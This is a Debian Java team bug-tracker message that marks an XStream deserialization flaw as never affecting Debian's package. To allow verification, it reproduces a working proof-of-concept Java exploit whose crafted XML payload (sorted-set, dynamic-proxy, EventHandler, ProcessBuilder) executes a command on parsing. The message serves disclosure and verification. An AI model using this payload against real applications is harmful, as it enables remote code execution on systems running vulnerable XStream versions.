notfixed 734821 1.4.7-1 thanks This bug never affected Debian: it was introduced upstream in 1.4.5 and fixed in 1.4.7, and the Debian package version is 1.4.7-1.
If anyone is interested in verifying this, the following code can be run against the JARs present at http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/: import java.io.IOException; import com.thoughtworks.xstream.XStream; import com.thoughtworks.xstream.io.xml.DomDriver; /* Thanks to </pwntester> for the PoC * http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ */ public class XStreamExploit { public static void main(String[] args) throws IOException { String process = "/usr/bin/xeyes"; String payload = "<sorted-set>" + "<string>foo</string>" + "<dynamic-proxy>" + "<interface>java.lang.Comparable</interface>" + "<handler class=\"java.beans.EventHandler\">" + " <target class=\"java.lang.ProcessBuilder\">" + " <command>" + " <string>" + process + "</string>" + " </command>" + " </target>" + " <action>start</action>" + "</handler>" + "</dynamic-proxy>" + "</sorted-set>"; XStream xstream = new XStream(new DomDriver()); xstream.fromXML(payload); } } Cheers, --Seb __ This is the maintainer address of Debian's Java team <http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-java-maintainers>. Please use debian-j...@lists.debian.org for discussions and questions.